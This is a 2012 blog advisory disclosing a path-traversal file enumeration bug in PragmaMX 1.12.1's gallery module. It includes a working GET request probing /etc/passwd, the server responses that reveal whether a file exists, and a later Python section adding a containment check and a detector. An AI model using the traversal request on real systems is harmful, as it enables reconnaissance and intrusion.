Sunday, 18 March 2012
[EN] PragmaMX 1.12.1 - remote file enumeration
# TITLE ....... # PragmaMx 1.12.1 remote file enumeration ......................................... #
# DATE ........ # 15.03.2012 ...................................................................... #
# AUTHOR ...... # http://hauntit.blogspot.com ..................................................... #
# SOFT LINK ... # http://pragmamx.org ............................................................. #
# VERSION ..... # 1.12.1 .......................................................................... #
# TESTED ON ... # LAMP ............................................................................ #
# ................................................................................................. #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#..........................................................#
# 1. What is this?
This is a very nice CMS, You should try it! ;)
#..........................................................#
# 2. What is the type of vulnerability?
This is a "remote file enumeration" bug.
After some fuzzing tests I found some nice behaviour in the new PragmaMX.
The "correct functionality" is that the z parameter carries the image filename.
I did something else: I pointed the 'filename' at 'another file in the file system',
for example /etc/passwd.
#..........................................................#
# 3. Where is bug :)
The vulnerable parameter is "z".
If we send a GET like this:
http://pragmamx.1.12.1/html/modules.php?name=My_eGallery&file=image&z=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&width=295&height=420
our response should look like:
...cut.from.Burp...
(...)
<head>
<title>/etc/passwd</title>
</head>
<body style="margin: 0; padding: 0;">
<img src="../../../../../../../../../../../../etc/passwd" width="295" height="420" alt="/etc/passwd" /> </body>
</html>
...cut.from.Burp...
This will be the answer "if the remote file is there". By "there" I mean the location of the file You point at.
If the file You chose is not there, the answer will be something like:
(GET:
http://pragmamx.1.12.1/html/modules.php?name=My_eGallery&file=image&z=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswdlalala.txt&width=295&height=420
)
...cut.from.Burp...
<head>
<title></title>
</head>
<body style="margin: 0; padding: 0;">
<img src="../../../../../../../../../../../../etc/passwdlalala.txt" width="295" height="420" alt="" /> </body>
</html>
...cut.from.Burp...
So the difference is in the "alt" attribute (and the <title>) of the answer.
If we can 'find a file x' on the remote server, then the name 'x' is echoed back in the HTTP response.
If the file (x) can not be found at the remote location, then the output (alt attribute) is blank.
This vulnerability can be used to:
a) check for some other LFI/RFI-based attacks
b) write a bruteforcer to determine OS/PHP version, get paths of configs, etc...
And here is where it comes from:
./modules/My_eGallery/image.php:19:$img = (isset($_GET['z']) && is_string($_GET['z'])) ? $_GET['z'] : '';
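The line above only checks that z is a string, not that it names a file under the gallery. As an added example (Python, not PragmaMX's own PHP), the containment check that is missing, plus the same test turned around to flag suspicious requests in a log; GALLERY_ROOT, safe_gallery_path and is_suspicious_image_request are assumed names.

```python
import os
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Assumed gallery directory; the real one is whatever My_eGallery is configured to serve.
GALLERY_ROOT = "/srv/pragmamx/html/modules/My_eGallery/gallery"
IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def extract_z(url: str) -> str:
    """Decoded 'z' query parameter ('' if absent), as image.php line 19 reads it; '..%2f' becomes '../'."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("z", [""])[0]


def safe_gallery_path(z: str, root: str = GALLERY_ROOT) -> Optional[str]:
    """Resolve z strictly inside root; None means the request must be refused.

    This is the check the original line lacks: is_string() guarantees a string,
    not that the string stays inside the gallery directory.
    """
    if not z or "\x00" in z:
        return None
    root = os.path.realpath(root)
    # join() discards root when z is absolute, realpath() collapses ../ and symlinks,
    # so both "/etc/passwd" and "../../etc/passwd" end up outside root below.
    candidate = os.path.realpath(os.path.join(root, z))
    if os.path.commonpath([root, candidate]) != root:
        return None  # escaped the gallery directory
    if os.path.splitext(candidate)[1].lower() not in IMAGE_EXTENSIONS:
        return None  # images only, so arbitrary file names cannot be probed at all
    return candidate


def is_suspicious_image_request(url: str) -> bool:
    """Detection view: a My_eGallery image request whose z the check above would refuse."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if qs.get("name", [""])[0] != "My_eGallery" or qs.get("file", [""])[0] != "image":
        return False
    z = extract_z(url)
    return bool(z) and safe_gallery_path(z) is None


if __name__ == "__main__":
    # Constructed request URLs: the advisory's traversal and a legitimate gallery image.
    probe = ("http://pragmamx.1.12.1/html/modules.php?name=My_eGallery&file=image"
             "&z=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&width=295&height=420")
    legit = "http://pragmamx.1.12.1/html/modules.php?name=My_eGallery&file=image&z=album1%2fphoto.jpg"
    for u in (probe, legit):
        print(is_suspicious_image_request(u), safe_gallery_path(extract_z(u)))
```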
#..........................................................#
# 4. More...
- http://www.pragmamx.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
#..........................................................#
# 5. Mail me, I'm still looking for new projects... ;)
#............................................#
# Best regards
#